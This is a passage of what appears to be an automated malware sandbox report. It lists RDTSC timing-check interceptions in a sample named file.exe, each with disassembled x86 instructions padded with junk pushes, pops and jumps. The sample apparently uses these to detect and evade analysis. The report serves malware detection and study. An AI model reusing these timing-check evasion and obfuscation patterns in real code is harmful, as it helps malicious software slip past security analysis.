00007F6C14B9223Eh 0x0000006a push eax 0x0000006b pushad 0x0000006c pushad 0x0000006d jp 00007F6C14B92236h 0x00000073 jmp 00007F6C14B9223Bh 0x00000078 popad 0x00000079 push ebx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100828F second address: 1008295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A468 second address: 100A46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008295 second address: 100830B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c movzx ebx, si 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, 2A876E36h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jne 00007F6C1537B648h 0x00000028 mov eax, dword ptr [ebp+122D130Dh] 0x0000002e sbb bx, D9E8h 0x00000033 push FFFFFFFFh 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F6C1537B648h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f nop 0x00000050 pushad 0x00000051 push ebx 0x00000052 push eax 0x00000053 pop eax 0x00000054 pop ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10093CB second address: 10093D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A46C second address: 100A471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10093D0 second address: 10093E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B9223Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A471 second address: 100A477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013148 second address: 1013152 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013152 second address: 1013159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10132C7 second address: 10132DB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C14B9223Eh 0x00000008 jo 00007F6C14B92236h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10135E9 second address: 101363A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F6C1537B646h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007F6C1537B652h 0x00000012 jmp 00007F6C1537B64Ah 0x00000017 jmp 00007F6C1537B64Bh 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 jmp 00007F6C1537B654h 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016995 second address: 10169AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92245h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10169AF second address: 10169B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10169B5 second address: 10169D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B9223Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C14B9223Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10169D7 second address: 1016A00 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C1537B648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e ja 00007F6C1537B65Eh 0x00000014 pushad 0x00000015 jmp 00007F6C1537B650h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016A00 second address: 1016A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jo 00007F6C14B92238h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016B05 second address: 1016B1E instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C1537B648h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F6C1537B646h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016B1E second address: 1016B3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C14B92244h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016B3A second address: 1016B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a jmp 00007F6C1537B64Fh 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F6C1537B651h 0x0000001c jmp 00007F6C1537B64Bh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016C3A second address: 1016C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F6C14B92236h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D84B second address: 101D857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F6C1537B646h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D857 second address: 101D891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C14B92249h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F6C14B92243h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D891 second address: 101D897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C5FC second address: 101C600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C600 second address: 101C60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6C1537B648h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D012 second address: 101D018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D018 second address: 101D01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D01C second address: 101D020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D165 second address: 101D179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C1537B64Bh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D179 second address: 101D191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92244h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D191 second address: 101D1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C1537B64Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D598 second address: 101D5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF3FC second address: FEF400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF400 second address: FEF406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF406 second address: FEF466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C1537B652h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jg 00007F6C1537B646h 0x00000016 jmp 00007F6C1537B652h 0x0000001b popad 0x0000001c je 00007F6C1537B64Ch 0x00000022 popad 0x00000023 nop 0x00000024 mov dword ptr [ebp+122D252Dh], esi 0x0000002a mov di, F54Eh 0x0000002e lea eax, dword ptr [ebp+124711A4h] 0x00000034 sub edi, dword ptr [ebp+122D2D6Ah] 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF466 second address: FEF474 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF474 second address: FD6BF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6C1537B64Bh 0x0000000d nop 0x0000000e xor ecx, dword ptr [ebp+122D2B92h] 0x00000014 call dword ptr [ebp+12442CFFh] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d je 00007F6C1537B646h 0x00000023 jmp 00007F6C1537B64Ah 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F6C1537B650h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF951 second address: FEF974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92243h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jnl 00007F6C14B92236h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF974 second address: FEF979 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFAF6 second address: FEFAFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFAFA second address: FEFB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F6C1537B65Bh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6C1537B652h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFC55 second address: FEFC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFC59 second address: FEFC5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFC5D second address: FEFC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFC63 second address: FEFC7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B650h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFC7E second address: FEFC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFE8F second address: FEFE95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0389 second address: FF039F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C14B9223Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0663 second address: FF0685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C1537B650h 0x00000008 jnl 00007F6C1537B646h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0685 second address: FF068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF068C second address: FF0692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF076D second address: FD771E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6C14B9223Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6C14B92246h 0x00000011 nop 0x00000012 mov edi, 10C64635h 0x00000017 lea eax, dword ptr [ebp+124711E8h] 0x0000001d jmp 00007F6C14B92243h 0x00000022 push eax 0x00000023 jp 00007F6C14B9224Bh 0x00000029 jmp 00007F6C14B92245h 0x0000002e mov dword ptr [esp], eax 0x00000031 mov ecx, edi 0x00000033 lea eax, dword ptr [ebp+124711A4h] 0x00000039 or dword ptr [ebp+122D21FBh], edx 0x0000003f nop 0x00000040 jnl 00007F6C14B92240h 0x00000046 push eax 0x00000047 jp 00007F6C14B9223Eh 0x0000004d nop 0x0000004e movzx ecx, dx 0x00000051 call dword ptr [ebp+122D1CE9h] 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD771E second address: FD7753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6C1537B650h 0x0000000f jmp 00007F6C1537B64Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021113 second address: 1021139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92242h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F6C14B9223Ch 0x00000013 jc 00007F6C14B92236h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021274 second address: 102127A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102127A second address: 1021280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102168D second address: 1021694 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025CAD second address: 1025CB3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025CB3 second address: 1025CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025E45 second address: 1025E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025E4C second address: 1025E6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C1537B64Ch 0x00000008 push esi 0x00000009 jmp 00007F6C1537B64Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10266A7 second address: 10266C2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C14B92238h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C14B9223Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10266C2 second address: 10266D5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C1537B646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10266D5 second address: 10266E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F6C14B9223Ch 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10266E6 second address: 1026703 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C1537B657h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F6C1537B64Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1026703 second address: 1026707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADEE7 second address: FADEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADEEB second address: FADEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6C14B92236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADEFA second address: FADF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BE4E second address: 102BE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C26D second address: 102C273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C273 second address: 102C279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C279 second address: 102C281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C39D second address: 102C3A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C3A3 second address: 102C3C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C3C2 second address: 102C3CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C3CA second address: 102C3D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C867 second address: 102C87C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B9223Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CC24 second address: 102CC28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CC28 second address: 102CC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6C14B92240h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CC40 second address: 102CC5D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C1537B656h 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CDAF second address: 102CDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92241h 0x00000009 jne 00007F6C14B92236h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F6C14B92247h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D215 second address: 102D220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D220 second address: 102D22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F6C14B92236h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D22C second address: 102D230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D230 second address: 102D23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6C14B92242h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D23E second address: 102D244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103617E second address: 103619C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 js 00007F6C14B92252h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C14B92240h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103619C second address: 10361A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
